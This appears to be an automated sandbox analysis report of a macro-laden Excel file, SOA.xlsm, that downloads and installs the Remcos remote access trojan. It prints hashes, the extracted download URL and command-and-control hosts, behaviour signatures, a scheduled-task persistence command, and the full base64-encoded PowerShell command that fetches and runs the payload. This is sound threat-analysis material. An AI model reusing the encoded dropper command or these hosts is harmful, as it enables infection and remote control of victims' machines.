Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
15-04-2021 09:33
Static task
static1
Behavioral task
behavioral1
Sample
SOA.xlsm
Resource
win7v20210408
General
-
Target
SOA.xlsm
-
Size
18KB
-
MD5
5af73df3782494331cb85c3278054f94
-
SHA1
f4ddfd5507b0f92caec0588309d75292daa28693
-
SHA256
eb065c4072ee30b3644a847c8f28044eb183977f39e1f90de08d098d8dd70eec
-
SHA512
6ee5a826804664593d336a19c317e30f13f9d0d902f75bcef4668b30de08016e23a85575090248a376f5ac1afc36f13f17599b062dcf07da46eb3a8f732a4483
Malware Config
Extracted
http://a0532749.xsph.ru/RR.exe
Extracted
remcos
shahzad73.ddns.net:2404
shahzad73.casacam.net:2404
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2704 2256 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 18 632 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
dWQYX.exedWQYX.exepid process 3788 dWQYX.exe 3748 dWQYX.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
dWQYX.exedescription pid process target process PID 3788 set thread context of 3748 3788 dWQYX.exe dWQYX.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2256 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exedWQYX.exepid process 632 powershell.exe 632 powershell.exe 632 powershell.exe 3788 dWQYX.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
dWQYX.exepid process 3748 dWQYX.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exedWQYX.exedescription pid process Token: SeDebugPrivilege 632 powershell.exe Token: SeDebugPrivilege 3788 dWQYX.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 2256 EXCEL.EXE 2256 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
EXCEL.EXEdWQYX.exepid process 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 2256 EXCEL.EXE 3748 dWQYX.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
EXCEL.EXEcmd.execmd.exedWQYX.exedescription pid process target process PID 2256 wrote to memory of 2704 2256 EXCEL.EXE cmd.exe PID 2256 wrote to memory of 2704 2256 EXCEL.EXE cmd.exe PID 2704 wrote to memory of 1732 2704 cmd.exe cmd.exe PID 2704 wrote to memory of 1732 2704 cmd.exe cmd.exe PID 1732 wrote to memory of 632 1732 cmd.exe powershell.exe PID 1732 wrote to memory of 632 1732 cmd.exe powershell.exe PID 2256 wrote to memory of 3788 2256 EXCEL.EXE dWQYX.exe PID 2256 wrote to memory of 3788 2256 EXCEL.EXE dWQYX.exe PID 2256 wrote to memory of 3788 2256 EXCEL.EXE dWQYX.exe PID 3788 wrote to memory of 208 3788 dWQYX.exe schtasks.exe PID 3788 wrote to memory of 208 3788 dWQYX.exe schtasks.exe PID 3788 wrote to memory of 208 3788 dWQYX.exe schtasks.exe PID 3788 wrote to memory of 3748 3788 dWQYX.exe dWQYX.exe PID 3788 wrote to memory of 3748 3788 dWQYX.exe dWQYX.exe PID 3788 wrote to memory of 3748 3788 dWQYX.exe dWQYX.exe PID 3788 wrote to memory of 3748 3788 dWQYX.exe dWQYX.exe PID 3788 wrote to memory of 3748 3788 dWQYX.exe dWQYX.exe PID 3788 wrote to memory of 3748 3788 dWQYX.exe dWQYX.exe PID 3788 wrote to memory of 3748 3788 dWQYX.exe dWQYX.exe PID 3788 wrote to memory of 3748 3788 dWQYX.exe dWQYX.exe PID 3788 wrote to memory of 3748 3788 dWQYX.exe dWQYX.exe PID 3788 wrote to memory of 3748 3788 dWQYX.exe dWQYX.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SOA.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\dWQYX.exeC:\Users\Admin\AppData\Local\Temp\dWQYX.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eHVFQKLt" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE3BE.tmp"3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\dWQYX.exe"{path}"3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\dWQYX.exeMD5
f31d91bf0dde9b21c9ab64883fe5e022
SHA1675362cb546323a38842f3dbd000def375f9760f
SHA25639fc3bd4df8f4ef4f7ceaa9d41626bf066fa423db69713eaf3105e4bf97fc3da
SHA5120f4e66006d71f37b2179d67a905923868ef0832aefa1929e7d9d0fa9d4ef7278d7509579463ff7b3a3d6f3992f4816c2e82975df5c4ed982d4b1ed6b06071ab9
-
C:\Users\Admin\AppData\Local\Temp\dWQYX.exeMD5
f31d91bf0dde9b21c9ab64883fe5e022
SHA1675362cb546323a38842f3dbd000def375f9760f
SHA25639fc3bd4df8f4ef4f7ceaa9d41626bf066fa423db69713eaf3105e4bf97fc3da
SHA5120f4e66006d71f37b2179d67a905923868ef0832aefa1929e7d9d0fa9d4ef7278d7509579463ff7b3a3d6f3992f4816c2e82975df5c4ed982d4b1ed6b06071ab9
-
C:\Users\Admin\AppData\Local\Temp\dWQYX.exeMD5
f31d91bf0dde9b21c9ab64883fe5e022
SHA1675362cb546323a38842f3dbd000def375f9760f
SHA25639fc3bd4df8f4ef4f7ceaa9d41626bf066fa423db69713eaf3105e4bf97fc3da
SHA5120f4e66006d71f37b2179d67a905923868ef0832aefa1929e7d9d0fa9d4ef7278d7509579463ff7b3a3d6f3992f4816c2e82975df5c4ed982d4b1ed6b06071ab9
-
C:\Users\Admin\AppData\Local\Temp\tmpE3BE.tmpMD5
bbfd93a5e28f4f3510d17606b2769cc8
SHA1f997b645cdd0efc248deee2327096fd82579d614
SHA256ff15bf6dfe658b8dd2b0a357d5a0b1768f0a2ce1125266d645b374e68ec696ea
SHA5120a52760a5c4cf07387b361e09e6e63cc31aa143688a819581db0d12b75bf4d4fccb14932b87de088c076ece865f6030f5f74c18c76e9b8a109a97ce06fb51a49
-
memory/208-189-0x0000000000000000-mapping.dmp
-
memory/632-181-0x0000000000000000-mapping.dmp
-
memory/632-184-0x000001D7CFC46000-0x000001D7CFC48000-memory.dmpFilesize
8KB
-
memory/632-183-0x000001D7CFC43000-0x000001D7CFC45000-memory.dmpFilesize
8KB
-
memory/632-182-0x000001D7CFC40000-0x000001D7CFC42000-memory.dmpFilesize
8KB
-
memory/1732-180-0x0000000000000000-mapping.dmp
-
memory/2256-121-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2256-123-0x00007FF878CF0000-0x00007FF87ABE5000-memory.dmpFilesize
31.0MB
-
memory/2256-122-0x00007FF87ABF0000-0x00007FF87BCDE000-memory.dmpFilesize
16.9MB
-
memory/2256-114-0x00007FF6B3180000-0x00007FF6B6736000-memory.dmpFilesize
53.7MB
-
memory/2256-118-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2256-117-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2256-116-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2256-115-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2704-179-0x0000000000000000-mapping.dmp
-
memory/3748-191-0x0000000000413FA4-mapping.dmp
-
memory/3748-193-0x0000000000400000-0x0000000000421000-memory.dmpFilesize
132KB
-
memory/3788-186-0x0000000000000000-mapping.dmp
-
memory/3788-188-0x00000000071C0000-0x00000000076BE000-memory.dmpFilesize
5.0MB